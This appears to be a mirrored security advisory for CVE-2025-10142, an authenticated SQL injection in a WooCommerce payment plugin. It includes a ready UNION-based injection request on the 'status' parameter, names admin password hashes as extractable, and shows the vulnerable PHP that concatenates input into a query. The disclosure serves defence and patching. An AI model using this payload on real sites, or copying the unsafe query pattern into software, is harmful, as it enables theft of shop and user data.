CVE-2025-10142 PoC — PagBank / PagSeguro Connect para WooCommerce <= 4.44.3 - Authenticated (Shop Manager+) SQL Injection

Source

https://github.com/MooseLoveti/PagSeguro-Connect-Para-WooCommerce-CVE-Report

Associated Vulnerability

Title:PagBank / PagSeguro Connect para WooCommerce <= 4.44.3 - Authenticated (Shop Manager+) SQL Injection (CVE-2025-10142)
Description:The PagBank / PagSeguro Connect para WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'status' parameter in all versions up to, and including, 4.44.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Description

Disclosure for CVE-2025-10142

Readme

# PagSeguro-Connect-Para-WooCommerce-CVE-Report

Disclosure for CVE-2025-10142

# CVE-2025-10142 - Vulnerability in PagSeguro-Connect-para-WooCommerce

This repository discloses a vulnerability discovered in [PagSeguro-Connect-para-WooCommerce <= 4.44.3](https://wordpress.org/plugins/pagbank-connect/),WordPress plugin developed by Ricardo Martins.

## 🛠 Affected Version

- **Product**: PagSeguro-Connect-para-WooCommerce
- **Version**: v4.44.3
- **URL**: https://wordpress.org/plugins/pagbank-connect/

---

## 🔒 Assigned CVE
| CVE ID            | Type                      | Component                | Impact                    |
|-------------------|---------------------------|--------------------------|---------------------------|
| CVE-2025-10142    | Authenticated (Shop Manager+) SQL Injection                | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php             | Authenticated attacker can exfiltrate data     |  

---

## 🧾 Detailed a Description

### CVE-2025-10142 — Unauthorized Database Access And Data Exfiltration

 - **Affected Component**: rm-pagbank-subscriptions admin page
 - **Attack Vector**: Authenticated (Shop Manager or Administrator) via GET request
 - **Trigger**: By injecting malicious SQL into the status parameter, an attacker can extract sensitive data from the database via UNION-based SQL injection.
```
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -

```
 - **Impact**: Injected SQL is executed and the results are rendered in the HTML table in the admin page. Examples of extractable data include:
   - version() → Database version
   - user() → MySQL user
   - database() → Database name
   - SELECT user_login, user_pass FROM wp_users (hashed admin credentials)
   - Any data from wp_options, wp_usermeta, etc.
     
## ❓Reason for the vulnerability
 The status parameter is directly concatenated into a SQL query without escaping or using $wpdb->prepare()

 ```
 if (!empty($_REQUEST['status'])) {
            $status = sanitize_text_field(wp_unslash($_REQUEST['status']));
            $where .= " AND status = '$status'";
        }

 $this->items = $wpdb->get_results(
            $wpdb->prepare(
                "SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY  $orderby $order LIMIT %d OFFSET %d",
                $per_page,
                ($current_page - 1) * $per_page
            ),
            ARRAY_A
        );
 ...

 
 ```
　

 
## 🔍 Discoverer

**Name**: MooseLove  
**Role**: Independent security researcher / bug hunter  
**Contact**: Available upon request  

---

## 📚 References

- Product: https://wordpress.org/plugins/pagbank-connect/

---

## ⚠️ License

This advisory is provided for public security awareness. Free to share with attribution.

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!